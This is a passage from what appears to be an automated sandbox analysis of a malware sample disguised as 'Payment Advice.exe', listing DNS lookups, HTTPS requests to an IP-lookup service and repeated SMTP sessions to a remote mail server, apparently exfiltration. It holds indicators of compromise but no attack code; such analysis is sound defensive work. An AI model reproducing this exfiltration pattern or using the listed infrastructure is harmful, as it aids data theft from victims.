                                                                                    Apr 18, 2024 18:30:19.307053089 CEST5874977594.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:30:19.308614969 CEST5874977594.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:30:19.308648109 CEST5874977594.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:30:19.308680058 CEST49775587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:30:19.308700085 CEST5874977594.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:30:19.653143883 CEST5874977594.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:30:19.653170109 CEST5874977594.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:30:19.653512001 CEST5874977594.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:30:19.653562069 CEST49775587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:30:19.653574944 CEST5874977594.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:30:19.654696941 CEST5874977594.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:30:19.656250000 CEST5874977594.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:30:20.002943039 CEST5874977594.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:30:20.798705101 CEST5874977594.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:30:20.843257904 CEST49775587192.168.2.494.100.26.91

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Apr 18, 2024 18:26:01.840276957 CEST5737753192.168.2.41.1.1.1
                                                                                    Apr 18, 2024 18:26:01.944864035 CEST53573771.1.1.1192.168.2.4
                                                                                    Apr 18, 2024 18:26:03.248054981 CEST5235053192.168.2.41.1.1.1
                                                                                    Apr 18, 2024 18:26:04.091023922 CEST53523501.1.1.1192.168.2.4

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Apr 18, 2024 18:26:01.840276957 CEST192.168.2.41.1.1.10x7fa5Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                    Apr 18, 2024 18:26:03.248054981 CEST192.168.2.41.1.1.10xbbe6Standard query (0)mail.seawaysfreight-bd.comA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Apr 18, 2024 18:26:01.944864035 CEST1.1.1.1192.168.2.40x7fa5No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                    Apr 18, 2024 18:26:01.944864035 CEST1.1.1.1192.168.2.40x7fa5No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                    Apr 18, 2024 18:26:01.944864035 CEST1.1.1.1192.168.2.40x7fa5No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                    Apr 18, 2024 18:26:04.091023922 CEST1.1.1.1192.168.2.40xbbe6No error (0)mail.seawaysfreight-bd.comseawaysfreight-bd.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Apr 18, 2024 18:26:04.091023922 CEST1.1.1.1192.168.2.40xbbe6No error (0)seawaysfreight-bd.com94.100.26.91A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • api.ipify.org

                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.449735104.26.13.2054437404C:\Users\user\Desktop\Payment Advice.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-04-18 16:26:02 UTC155OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                    Host: api.ipify.org
                                                                                    Connection: Keep-Alive
                                                                                    2024-04-18 16:26:02 UTC211INHTTP/1.1 200 OK
                                                                                    Date: Thu, 18 Apr 2024 16:26:02 GMT
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 12
                                                                                    Connection: close
                                                                                    Vary: Origin
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 876603a4ece1b0c4-ATL
                                                                                    2024-04-18 16:26:02 UTC12INData Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
                                                                                    Data Ascii: 81.181.57.52


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.449739104.26.13.2054437816C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-04-18 16:26:06 UTC155OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                    Host: api.ipify.org
                                                                                    Connection: Keep-Alive
                                                                                    2024-04-18 16:26:06 UTC211INHTTP/1.1 200 OK
                                                                                    Date: Thu, 18 Apr 2024 16:26:06 GMT
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 12
                                                                                    Connection: close
                                                                                    Vary: Origin
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 876603c0dbcf44e7-ATL
                                                                                    2024-04-18 16:26:06 UTC12INData Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
                                                                                    Data Ascii: 81.181.57.52


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.449742104.26.13.2054436576C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-04-18 16:26:16 UTC155OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                    Host: api.ipify.org
                                                                                    Connection: Keep-Alive
                                                                                    2024-04-18 16:26:16 UTC211INHTTP/1.1 200 OK
                                                                                    Date: Thu, 18 Apr 2024 16:26:16 GMT
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 12
                                                                                    Connection: close
                                                                                    Vary: Origin
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 876603fa8b556779-ATL
                                                                                    2024-04-18 16:26:16 UTC12INData Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
                                                                                    Data Ascii: 81.181.57.52


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.449750104.26.13.2054434092C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-04-18 16:26:23 UTC155OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                    Host: api.ipify.org
                                                                                    Connection: Keep-Alive
                                                                                    2024-04-18 16:26:24 UTC211INHTTP/1.1 200 OK
                                                                                    Date: Thu, 18 Apr 2024 16:26:24 GMT
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 12
                                                                                    Connection: close
                                                                                    Vary: Origin
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8766042cca6617fb-ATL
                                                                                    2024-04-18 16:26:24 UTC12INData Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
                                                                                    Data Ascii: 81.181.57.52


                                                                                    SMTP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                                                    Apr 18, 2024 18:26:05.086004019 CEST5874973894.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:26:04 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:26:05.086210012 CEST49738587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:26:05.503406048 CEST5874973894.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:26:05.504209995 CEST49738587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:26:05.918344975 CEST5874973894.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:26:08.595472097 CEST5874974094.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:26:08 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:26:08.607039928 CEST49740587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:26:09.024373055 CEST5874974094.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:26:09.024564028 CEST49740587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:26:09.440186024 CEST5874974094.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:26:17.751367092 CEST5874974794.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:26:17 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:26:17.751595974 CEST49747587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:26:18.204749107 CEST5874974794.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:26:18.204906940 CEST49747587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:26:18.687135935 CEST5874974794.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:26:25.561213017 CEST5874975194.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:26:25 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:26:25.561459064 CEST49751587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:26:25.960481882 CEST5874975194.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:26:25.960668087 CEST49751587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:26:26.370327950 CEST5874975194.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:27:33.116924047 CEST5874975394.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:27:32 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:27:33.117080927 CEST49753587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:27:33.419749022 CEST5874975494.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:27:33 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:27:33.419884920 CEST49754587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:27:33.454719067 CEST5874975394.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:27:33.455034971 CEST49753587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:27:33.736985922 CEST5874975494.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:27:33.737164974 CEST49754587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:27:33.791444063 CEST5874975394.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:27:34.055052996 CEST5874975494.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:28:08.661825895 CEST5874975594.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:28:08 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:28:08.662033081 CEST49755587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:28:09.082036018 CEST5874975594.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:28:09.082175016 CEST49755587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:28:09.491904020 CEST5874975594.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:28:10.422605038 CEST5874975694.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:28:10 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:28:10.661952972 CEST5874975694.100.26.91192.168.2.4421 daud.aptcom.info lost input connection
                                                                                    Apr 18, 2024 18:28:11.191382885 CEST5874975794.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:28:11 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:28:11.191529989 CEST49757587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:28:11.615143061 CEST5874975794.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:28:11.615398884 CEST49757587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:28:12.033521891 CEST5874975794.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:28:13.039503098 CEST5874975894.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:28:12 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:28:13.039908886 CEST49758587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:28:13.450272083 CEST5874975894.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:28:13.450408936 CEST49758587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:28:13.843822956 CEST5874975894.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:28:23.357388973 CEST5874975994.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:28:23 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:28:23.357575893 CEST49759587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:28:23.674895048 CEST5874975994.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:28:23.675051928 CEST49759587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:28:23.993309021 CEST5874975994.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:28:37.372211933 CEST5874976094.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:28:37 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:28:37.372344017 CEST49760587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:28:37.719393969 CEST5874976094.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:28:37.719537020 CEST49760587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:28:38.066613913 CEST5874976094.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:28:41.265181065 CEST5874976194.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:28:41 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:28:41.265366077 CEST49761587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:28:41.613657951 CEST5874976194.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:28:41.613814116 CEST49761587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:28:41.970258951 CEST5874976194.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:28:43.405625105 CEST5874976294.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:28:43 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:28:43.405797005 CEST49762587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:28:43.754708052 CEST5874976294.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:28:43.754901886 CEST49762587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:28:44.532633066 CEST49762587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:28:44.657258034 CEST5874976294.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:28:44.887641907 CEST5874976294.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:28:49.258838892 CEST5874976394.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:28:49 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:28:49.259047031 CEST49763587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:28:49.601460934 CEST5874976394.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:28:49.601843119 CEST49763587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:28:49.956204891 CEST5874976394.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:28:50.824878931 CEST5874976294.100.26.91192.168.2.4421 Lost incoming connection
                                                                                    Apr 18, 2024 18:28:56.187978029 CEST5874976494.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:28:56 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:28:56.188179970 CEST49764587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:28:56.505361080 CEST5874976494.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:28:56.506412029 CEST49764587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:28:56.825459957 CEST5874976494.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:29:01.792551994 CEST5874976594.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:29:01 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:29:01.792695045 CEST49765587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:29:02.154078007 CEST5874976594.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:29:02.154392004 CEST49765587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:29:02.501596928 CEST5874976594.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:29:10.030574083 CEST5874976694.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:29:09 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:29:10.030719995 CEST49766587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:29:10.106517076 CEST5874976794.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:29:09 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:29:10.106657982 CEST49767587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:29:10.383198977 CEST5874976694.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:29:10.384572983 CEST49766587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:29:10.424048901 CEST5874976794.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:29:10.424216986 CEST49767587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:29:10.732556105 CEST5874976694.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:29:10.742633104 CEST5874976794.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:29:17.009036064 CEST5874976894.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:29:16 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:29:17.010613918 CEST49768587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:29:17.184669971 CEST5874976994.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:29:17 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:29:17.184940100 CEST49769587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:29:17.362822056 CEST5874976894.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:29:17.363009930 CEST49768587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:29:17.416994095 CEST5874976594.100.26.91192.168.2.4421 Lost incoming connection
                                                                                    Apr 18, 2024 18:29:17.610515118 CEST5874976994.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:29:17.610750914 CEST49769587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:29:17.713443041 CEST5874976894.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:29:18.026046991 CEST5874976994.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:29:25.639596939 CEST5874977094.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:29:25 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:29:25.639875889 CEST49770587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:29:25.991235018 CEST5874977094.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:29:25.991441965 CEST49770587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:29:26.345534086 CEST5874977094.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:29:33.801326036 CEST5874977194.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:29:33 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:29:33.801469088 CEST49771587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:29:34.048618078 CEST5874977094.100.26.91192.168.2.4421 Lost incoming connection
                                                                                    Apr 18, 2024 18:29:34.137705088 CEST5874977194.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:29:34.137900114 CEST49771587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:29:34.874681950 CEST49771587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:29:35.089317083 CEST5874977194.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
